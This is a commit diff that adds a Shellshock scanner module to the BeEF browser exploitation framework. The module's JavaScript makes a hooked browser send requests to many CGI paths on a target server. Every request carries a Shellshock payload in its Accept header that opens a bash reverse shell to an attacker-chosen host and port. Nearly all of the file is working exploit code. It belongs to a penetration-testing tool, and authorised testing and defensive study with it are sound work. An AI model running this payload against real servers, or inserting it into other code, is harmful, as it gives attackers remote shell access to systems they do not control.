Add Shell Shock Scanner module
This commit is contained in:
Brendan Coles
75
modules/exploits/shell_shock_scanner/command.js
Normal file
75
modules/exploits/shell_shock_scanner/command.js
Normal file
@@ -0,0 +1,75 @@
|
||||
//
|
||||
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var rproto = '<%= @rproto %>';
|
||||
var rhost = '<%= @rhost %>';
|
||||
var rport = '<%= @rport %>';
|
||||
var lhost = '<%= @lhost %>';
|
||||
var lport = '<%= @lport %>';
|
||||
var target = rproto + '://' + rhost + ':' + rport;
|
||||
var method = '<%= @method %>';
|
||||
var wait = '<%= @wait %>';
|
||||
var timeout = '<%= @timeout %>';
|
||||
|
||||
get_cgi = function(uri) {
|
||||
try {
|
||||
var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open(method, target+uri, true);
|
||||
xhr.onload = function () {
|
||||
};
|
||||
xhr.onreadystatechange = function () {
|
||||
if (xhr.readyState == 4 && xhr.status == 200) {
|
||||
beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
|
||||
}
|
||||
}
|
||||
xhr.setRequestHeader("Accept", payload);
|
||||
xhr.send(null);
|
||||
} catch (e){
|
||||
beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
|
||||
}
|
||||
}
|
||||
|
||||
var scripts = new Array(
|
||||
<%=
|
||||
scripts = []
|
||||
File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
|
||||
file_handle.each_line do |line|
|
||||
uri = line.chomp!
|
||||
next if uri =~ /^#/
|
||||
next if uri.nil?
|
||||
scripts << "'#{uri}'"
|
||||
end
|
||||
end
|
||||
scripts.shuffle.join(",\n")
|
||||
%>
|
||||
);
|
||||
|
||||
// add scripts to queue
|
||||
var requests = [];
|
||||
for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
|
||||
|
||||
// process queue
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
|
||||
var handle = setInterval(function() {
|
||||
if (requests.length > 0) {
|
||||
get_cgi(requests.pop());
|
||||
} else cleanup();
|
||||
}, wait*1000);
|
||||
|
||||
// clean up
|
||||
cleanup = function() {
|
||||
if (handle) {
|
||||
beef.debug("Killing timer [ID: " + handle + "]");
|
||||
clearInterval(handle);
|
||||
handle = 0;
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
|
||||
}
|
||||
}
|
||||
setTimeout("cleanup();", timeout*1000);
|
||||
|
||||
});
|
||||
Reference in New Issue
Block a user